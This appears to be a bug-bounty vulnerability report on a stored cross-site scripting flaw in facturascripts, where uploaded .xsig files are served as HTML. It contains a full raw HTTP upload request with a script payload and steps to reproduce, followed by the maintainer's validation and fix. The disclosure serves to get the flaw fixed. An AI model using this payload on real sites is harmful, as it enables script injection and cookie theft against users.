Cross-site scripting - Stored via upload `.xsig` file in neorazorx/facturascripts

Valid

Reported on

May 4th 2022


Description

When user upload a file with .xsig extension and direct access this file, the server response with Content-type: text/html lead to processing XSIG as HTML file.

Proof of Concept

POST /facturascripts/EditAttachedFile?code=1&action=save-ok HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------116175579928758251263819370629
Content-Length: 1356
Origin: http://localhost
Connection: close
Referer: http://localhost/facturascripts/EditAttachedFile?code=1&action=save-ok
Cookie: <web-cookies>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="action"

insert
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="activetab"

EditAttachedFile
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="code"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="multireqtoken"

99a8c7a2305b11e06fbd8bc0c9446f0826e73bdd|4vnVMk
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="path"; filename="xss.xsig"
Content-Type: text/html

<script>alert(window.origin)</script>
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="filename"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="mimetype"


-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="size"

0
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="date"

2022-04-30
-----------------------------116175579928758251263819370629
Content-Disposition: form-data; name="hour"

17:45:45
-----------------------------116175579928758251263819370629--

Step to reproduce

  1. Prepare a file xss.xsig with content: <script>alert(window.origin)</script>
  2. Upload xss.xsig file in Admin -> Library
  3. Click Download and XSS

Poc Image

image

Impact

This vulnerability can be arbitrarily executed javascript code to steal user'cookie, perform HTTP request, get content of same origin page, etc ...

We are processing your report and will contact the neorazorx/facturascripts team within 24 hours. 20 days ago
Carlos Garcia validated this vulnerability 19 days ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the neorazorx/facturascripts team. We will try again in 7 days. 16 days ago
Carlos Garcia confirmed that a fix has been merged on fd6f2d 16 days ago
Carlos Garcia has been awarded the fix bounty
to join this conversation